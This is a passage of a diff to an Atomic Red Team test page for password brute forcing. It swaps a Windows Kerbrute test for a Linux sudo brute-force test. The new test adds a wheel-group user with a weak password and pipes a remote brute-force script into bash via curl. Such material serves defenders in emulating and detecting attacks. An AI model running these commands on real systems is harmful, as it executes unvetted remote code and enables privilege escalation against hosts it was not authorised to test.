/usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi -if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi -if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi -if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi +```bash +if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi +if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi +if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi +if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi +if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi ``` ##### Get Prereq Commands: -```sh -yum -y update && yum install -y openssl sudo +```bash +apt update && apt install -y openssl sudo curl ``` @@ -313,13 +312,15 @@ yum -y update && yum install -y openssl sudo

-## Atomic Test #6 - Password Brute User using Kerbrute Tool -Bruteforce a single user's password from a wordlist +## Atomic Test #6 - SUDO Brute Force - Redhat +An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. -**Supported Platforms:** Windows +This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user +**Supported Platforms:** Linux -**auto_generated_guid:** 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 + +**auto_generated_guid:** 4097bc00-5eeb-4d56-aaf9-287d60351d95 @@ -328,39 +329,39 @@ Bruteforce a single user's password from a wordlist #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| domaincontroller | Domain controller where test will be run | string | $ENV:userdnsdomain| -| domain | Domain where you will be testing | string | $ENV:userdomain| +| remote_url | url of remote payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh| -#### Attack Commands: Run with `powershell`! +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -```powershell -cd $env:temp -.\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 +```bash +useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art +su art +cd /tmp +curl -s #{remote_url} |bash ``` +#### Cleanup Commands: +```bash +userdel -fr art +``` -#### Dependencies: Run with `powershell`! -##### Description: kerbrute.exe must exist in $env:temp -##### Check Prereq Commands: -```powershell -if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1} -``` -##### Get Prereq Commands: -```powershell -invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe" -``` -##### Description: bruteuser.txt must exist in $env:temp +#### Dependencies: Run with `bash`! +##### Description: Check if running on a Redhat based machine. ##### Check Prereq Commands: -```powershell -if (test-path $env:temp\bruteuser.txt){exit 0} else {exit 1} +```bash +if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi +if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi +if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi +if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi +if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi ``` ##### Get Prereq Commands: -```powershell -invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "$env:temp\bruteuser.txt" +```bash +yum update && yum install -y openssl sudo curl ```